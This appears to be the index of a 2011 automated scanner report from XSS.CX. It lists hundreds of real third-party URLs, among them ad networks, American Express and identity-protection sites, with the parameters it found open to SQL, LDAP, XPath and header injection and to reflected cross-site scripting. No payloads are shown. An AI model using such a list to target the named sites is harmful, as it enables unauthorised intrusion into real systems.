XSS, SQL Injection, HTTP Header Injection, CWE-79, CWE-89, cWE-113, DORK, GHDB Report for April 24, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon Apr 25 06:41:03 CDT 2011.



Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.4 [sz parameter]

1.2. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197 [REST URL parameter 3]

1.3. http://googleads.g.doubleclick.net/pagead/ads [client parameter]

1.4. https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1 [WC_GENERIC_ACTIVITYDATA cookie]

1.5. https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1 [name of an arbitrarily supplied request parameter]

1.6. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout [WC_GENERIC_ACTIVITYDATA cookie]

1.7. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails [WC_GENERIC_ACTIVITYDATA cookie]

1.8. http://www.freecreditscore.com/dni/default.aspx [PageTypeID parameter]

1.9. http://www.hotelclub.com/ [Referer HTTP header]

1.10. http://www.nextadvisor.com/link.php [__utma cookie]

2. File path traversal

3. LDAP injection

3.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

3.2. http://sftrack.searchforce.net/SFConversionTracking/redir [jaid parameter]

4. XPath injection

4.1. http://www.truecredit.com/ [User-Agent HTTP header]

4.2. https://www.trustedid.com/js/mootools.js [REST URL parameter 2]

4.3. https://www.trustedid.com/js/prototype.js [REST URL parameter 2]

5. HTTP header injection

5.1. http://ad-emea.doubleclick.net/adi/N5295.150290.INVITEMEDIA.COM/B5186974.5 [REST URL parameter 1]

5.2. http://ad.doubleclick.net/getcamphist [src parameter]

5.3. http://adfarm1.adition.com/track [name of an arbitrarily supplied request parameter]

5.4. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

5.5. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

5.6. http://matcher.bidder7.mookie1.com/google [cver parameter]

6. Cross-site scripting (reflected)

6.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [labels parameter]

6.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [redirecturl2 parameter]

6.3. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbdata2 parameter]

6.4. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbip parameter]

6.5. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [sz parameter]

6.6. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [adurl parameter]

6.7. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [ai parameter]

6.8. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [client parameter]

6.9. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [num parameter]

6.10. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [sig parameter]

6.11. http://ad.doubleclick.net/adi/N3671.Google/B5102071.8 [sz parameter]

6.12. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [age parameter]

6.13. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [ccw parameter]

6.14. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [ciu parameter]

6.15. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [dm parameter]

6.16. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [dv parameter]

6.17. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [ei parameter]

6.18. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [epid parameter]

6.19. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [euid parameter]

6.20. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [fiu parameter]

6.21. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [gen parameter]

6.22. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [os parameter]

6.23. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [refurl parameter]

6.24. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [reqid parameter]

6.25. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [rurl parameter]

6.26. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [s parameter]

6.27. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [scres parameter]

6.28. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [slotid parameter]

6.29. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [sz parameter]

6.30. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [t parameter]

6.31. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [wp_exchange parameter]

6.32. http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14 [zc parameter]

6.33. http://ads.adxpose.com/ads/ads.js [uid parameter]

6.34. http://adsfac.us/ag.asp [cc parameter]

6.35. http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-1 [mpt parameter]

6.36. http://api.tweetmeme.com/url_info.jsonc [callback parameter]

6.37. http://ar.voicefive.com/b/rc.pli [func parameter]

6.38. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 2]

6.39. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 3]

6.40. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 4]

6.41. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 5]

6.42. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 6]

6.43. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 [REST URL parameter 7]

6.44. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 2]

6.45. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 3]

6.46. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 4]

6.47. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 5]

6.48. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 6]

6.49. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 [REST URL parameter 7]

6.50. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 2]

6.51. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 3]

6.52. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 4]

6.53. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 5]

6.54. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 6]

6.55. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 [REST URL parameter 7]

6.56. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ifl parameter]

6.57. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html [btid parameter]

6.58. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html [btid parameter]

6.59. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html [btid parameter]

6.60. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html [btid parameter]

6.61. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html [btid parameter]

6.62. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html [btid parameter]

6.63. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html [btid parameter]

6.64. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html [btid parameter]

6.65. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html [btid parameter]

6.66. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html [btid parameter]

6.67. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html [btid parameter]

6.68. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html [btid parameter]

6.69. http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html [btid parameter]

6.70. http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html [btid parameter]

6.71. http://cdn.w55c.net/i/0RW21p2fqU_270915107.html [btid parameter]

6.72. http://cdn.w55c.net/i/0RW21p2fqU_270915107.html [btid parameter]

6.73. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html [btid parameter]

6.74. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html [btid parameter]

6.75. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html [btid parameter]

6.76. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html [btid parameter]

6.77. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html [btid parameter]

6.78. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html [btid parameter]

6.79. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html [btid parameter]

6.80. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html [btid parameter]

6.81. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [btid parameter]

6.82. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [btid parameter]

6.83. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ccw parameter]

6.84. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ccw parameter]

6.85. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ciu parameter]

6.86. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ciu parameter]

6.87. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ei parameter]

6.88. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [ei parameter]

6.89. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [euid parameter]

6.90. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [euid parameter]

6.91. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [fiu parameter]

6.92. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [fiu parameter]

6.93. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [reqid parameter]

6.94. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [reqid parameter]

6.95. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [s parameter]

6.96. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [s parameter]

6.97. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [slotid parameter]

6.98. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [slotid parameter]

6.99. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [wp_exchange parameter]

6.100. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [wp_exchange parameter]

6.101. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [zc parameter]

6.102. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html [zc parameter]

6.103. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html [btid parameter]

6.104. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html [btid parameter]

6.105. http://consumerinfo.tt.omtrdc.net/m2/consumerinfo/mbox/standard [mbox parameter]

6.106. http://controlcase.com/contact.php [name of an arbitrarily supplied request parameter]

6.107. http://controlcase.com/contact.php [subject parameter]

6.108. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [$ parameter]

6.109. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [$ parameter]

6.110. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [$ parameter]

6.111. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [$ parameter]

6.112. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [q parameter]

6.113. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [q parameter]

6.114. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [q parameter]

6.115. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [q parameter]

6.116. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js [$ parameter]

6.117. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js [$ parameter]

6.118. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js [q parameter]

6.119. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js [q parameter]

6.120. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.121. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.122. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.123. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.124. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.125. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.126. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.127. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.128. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

6.129. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

6.130. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]

6.131. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]

6.132. http://dm.de.mookie1.com/2/B3DM/RTB/11325065670@x24 [REST URL parameter 2]

6.133. http://dm.de.mookie1.com/2/B3DM/RTB/11325065670@x24 [REST URL parameter 3]

6.134. http://dm.de.mookie1.com/2/B3DM/RTB/11325065670@x24 [REST URL parameter 4]

6.135. http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24 [REST URL parameter 2]

6.136. http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24 [REST URL parameter 3]

6.137. http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24 [REST URL parameter 4]

6.138. http://dm.de.mookie1.com/2/B3DM/RTB/12132898267@x24 [REST URL parameter 2]

6.139. http://dm.de.mookie1.com/2/B3DM/RTB/12132898267@x24 [REST URL parameter 3]

6.140. http://dm.de.mookie1.com/2/B3DM/RTB/12132898267@x24 [REST URL parameter 4]

6.141. http://ds.addthis.com/red/psi/sites/krypt.com/p.json [callback parameter]

6.142. http://ds.addthis.com/red/psi/sites/www.krypt.com/p.json [callback parameter]

6.143. http://event.adxpose.com/event.flow [uid parameter]

6.144. http://hellometro.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

6.145. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

6.146. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

6.147. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

6.148. http://ib.adnxs.com/ab [cnd parameter]

6.149. http://ib.adnxs.com/if [cnd parameter]

6.150. http://image.providesupport.com/js/spiffyman/safe-standard.js [REST URL parameter 1]

6.151. http://image.providesupport.com/js/spiffyman/safe-standard.js [REST URL parameter 2]

6.152. http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html [mpck parameter]

6.153. http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html [mpck parameter]

6.154. http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html [mpvc parameter]

6.155. http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html [mpvc parameter]

6.156. http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html [placementid parameter]

6.157. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html [mpck parameter]

6.158. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html [mpck parameter]

6.159. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html [mpjs parameter]

6.160. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html [mpvc parameter]

6.161. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html [mpvc parameter]

6.162. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html [mpck parameter]

6.163. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html [mpck parameter]

6.164. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html [mpjs parameter]

6.165. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html [mpvc parameter]

6.166. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html [mpvc parameter]

6.167. http://kroogy.com/N [REST URL parameter 1]

6.168. http://kroogy.com/a [REST URL parameter 1]

6.169. http://kroogy.com/favicon.ico [REST URL parameter 1]

6.170. http://kroogy.com/index.php [page parameter]

6.171. http://kroogy.com/index/N [REST URL parameter 1]

6.172. http://kroogy.com/index/N [REST URL parameter 2]

6.173. http://kroogy.com/index/index.php [page parameter]

6.174. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 1]

6.175. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 2]

6.176. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 1]

6.177. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 2]

6.178. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 1]

6.179. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 2]

6.180. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 1]

6.181. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 2]

6.182. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 1]

6.183. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 2]

6.184. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]

6.185. http://kroogy.com/search/emailafriend [REST URL parameter 1]

6.186. http://kroogy.com/search/emailafriend [REST URL parameter 2]

6.187. http://kroogy.com/search/images/blank.gif [REST URL parameter 2]

6.188. http://kroogy.com/search/index.php [page parameter]

6.189. http://kroogy.com/search/news [REST URL parameter 1]

6.190. http://kroogy.com/search/news [REST URL parameter 2]

6.191. http://kroogy.com/search/noresults [REST URL parameter 1]

6.192. http://kroogy.com/search/noresults [REST URL parameter 2]

6.193. http://kroogy.com/search/random.php [REST URL parameter 1]

6.194. http://kroogy.com/search/random.php [REST URL parameter 2]

6.195. http://kroogy.com/search/redir [REST URL parameter 1]

6.196. http://kroogy.com/search/redir [REST URL parameter 2]

6.197. http://kroogy.com/search/special [REST URL parameter 1]

6.198. http://kroogy.com/search/special [REST URL parameter 2]

6.199. http://kroogy.com/search/videos [REST URL parameter 1]

6.200. http://kroogy.com/search/videos [REST URL parameter 2]

6.201. http://kroogy.com/search/web [REST URL parameter 1]

6.202. http://kroogy.com/search/web [REST URL parameter 2]

6.203. http://kroogy.com/search/web/N [REST URL parameter 1]

6.204. http://kroogy.com/search/web/N [REST URL parameter 2]

6.205. http://kroogy.com/search/web/index.php [page parameter]

6.206. https://online.americanexpress.com/myca/logon/us/action [DestPage parameter]

6.207. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]

6.208. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]

6.209. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

6.210. https://psr.infusionsoft.com/InAppHelp/popUpCenter.jsp [pageName parameter]

6.211. https://psr.infusionsoft.com/InAppHelp/popUpCenter.jsp [pageName parameter]

6.212. https://psr.infusionsoft.com/template/divFiller.jsp [divName parameter]

6.213. https://psr.infusionsoft.com/template/divFiller.jsp [divName parameter]

6.214. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]

6.215. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]

6.216. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]

6.217. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]

6.218. http://pub.retailer-amazon.net/banner_728_90_a.php [name of an arbitrarily supplied request parameter]

6.219. http://pub.retailer-amazon.net/banner_728_90_a.php [name of an arbitrarily supplied request parameter]

6.220. http://pub.retailer-amazon.net/banner_728_90_a.php [search parameter]

6.221. http://pub.retailer-amazon.net/banner_728_90_a.php [search parameter]

6.222. http://pub.retailer-amazon.net/banner_728_90_b.php [name of an arbitrarily supplied request parameter]

6.223. http://pub.retailer-amazon.net/banner_728_90_b.php [search parameter]

6.224. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

6.225. http://r.turn.com/server/beacon_call.js [b2 parameter]

6.226. http://s18.sitemeter.com/js/counter.asp [site parameter]

6.227. http://s18.sitemeter.com/js/counter.js [site parameter]

6.228. http://s41.sitemeter.com/js/counter.asp [site parameter]

6.229. http://s41.sitemeter.com/js/counter.js [site parameter]

6.230. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

6.231. http://seal.controlcase.com/index.php [cId parameter]

6.232. http://seal.controlcase.com/index.php [clientid parameter]

6.233. http://seal.controlcase.com/index.php [clientid parameter]

6.234. http://seal.controlcase.com/index.php [name of an arbitrarily supplied request parameter]

6.235. http://seal.controlcase.com/index.php [name of an arbitrarily supplied request parameter]

6.236. http://seal.controlcase.com/index.php [name of an arbitrarily supplied request parameter]

6.237. http://services.digg.com/1.0/endpoint [callback parameter]

6.238. http://services.digg.com/1.0/endpoint [method parameter]

6.239. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]

6.240. http://services.digg.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.241. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [drilldown parameter]

6.242. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [lang parameter]

6.243. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [name of an arbitrarily supplied request parameter]

6.244. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [nsextt parameter]

6.245. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [subcat parameter]

6.246. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx [subcat parameter]

6.247. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [cat parameter]

6.248. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [cat parameter]

6.249. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [drilldown parameter]

6.250. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [id parameter]

6.251. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [name of an arbitrarily supplied request parameter]

6.252. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [nsextt parameter]

6.253. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [subcat parameter]

6.254. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductConfig/ProductConfig.aspx [subcat parameter]

6.255. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductDetail/ProductDetail.aspx [id parameter]

6.256. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductDetail/ProductDetail.aspx [id parameter]

6.257. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [drilldown parameter]

6.258. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [lang parameter]

6.259. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [name of an arbitrarily supplied request parameter]

6.260. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [nsextt parameter]

6.261. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [subcat parameter]

6.262. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx [subcat parameter]

6.263. http://widgets.digg.com/buttons/count [url parameter]

6.264. http://www.actividentity.com/inc/securimage/securimage_play.swf [REST URL parameter 1]

6.265. http://www.actividentity.com/inc/securimage/securimage_play.swf [REST URL parameter 2]

6.266. http://www.actividentity.com/inc/securimage/securimage_play.swf [REST URL parameter 3]

6.267. http://www.actividentity.com/inc/securimage/securimage_show.phpx [REST URL parameter 1]

6.268. http://www.actividentity.com/inc/securimage/securimage_show.phpx [REST URL parameter 2]

6.269. http://www.actividentity.com/inc/securimage/securimage_show.phpx [REST URL parameter 3]

6.270. http://www.dictof.com/favicon.ico [REST URL parameter 1]

6.271. http://www.dictof.com/registration/ [email parameter]

6.272. http://www.dictof.com/registration/ [newPassword parameter]

6.273. http://www.dictof.com/registration/ [postalCode parameter]

6.274. http://www.dictof.com/registration/ [refererNickname parameter]

6.275. http://www.dictof.com/registration/ [screenname parameter]

6.276. http://www.fightidentitytheft.com/credit-monitoring.html [REST URL parameter 1]

6.277. http://www.fightidentitytheft.com/credit-monitoring.html [name of an arbitrarily supplied request parameter]

6.278. http://www.fightidentitytheft.com/files/fightid_favicon.ico [REST URL parameter 1]

6.279. http://www.fightidentitytheft.com/files/fightid_favicon.ico [REST URL parameter 2]

6.280. http://www.fightidentitytheft.com/misc/drupal.js [REST URL parameter 1]

6.281. http://www.fightidentitytheft.com/misc/drupal.js [REST URL parameter 2]

6.282. http://www.fightidentitytheft.com/misc/jquery.js [REST URL parameter 1]

6.283. http://www.fightidentitytheft.com/misc/jquery.js [REST URL parameter 2]

6.284. http://www.fightidentitytheft.com/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 1]

6.285. http://www.fightidentitytheft.com/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 2]

6.286. http://www.fightidentitytheft.com/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 3]

6.287. http://www.fightidentitytheft.com/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 4]

6.288. http://www.fightidentitytheft.com/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 5]

6.289. http://www.fightidentitytheft.com/sites/all/modules/mollom/mollom.js [REST URL parameter 1]

6.290. http://www.fightidentitytheft.com/sites/all/modules/mollom/mollom.js [REST URL parameter 2]

6.291. http://www.fightidentitytheft.com/sites/all/modules/mollom/mollom.js [REST URL parameter 3]

6.292. http://www.fightidentitytheft.com/sites/all/modules/mollom/mollom.js [REST URL parameter 4]

6.293. http://www.fightidentitytheft.com/sites/all/modules/mollom/mollom.js [REST URL parameter 5]

6.294. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/nice_menus.js [REST URL parameter 1]

6.295. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/nice_menus.js [REST URL parameter 2]

6.296. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/nice_menus.js [REST URL parameter 3]

6.297. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/nice_menus.js [REST URL parameter 4]

6.298. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/nice_menus.js [REST URL parameter 5]

6.299. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 1]

6.300. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 2]

6.301. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 3]

6.302. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 4]

6.303. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 5]

6.304. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 6]

6.305. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 7]

6.306. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 1]

6.307. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 2]

6.308. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 3]

6.309. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 4]

6.310. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 5]

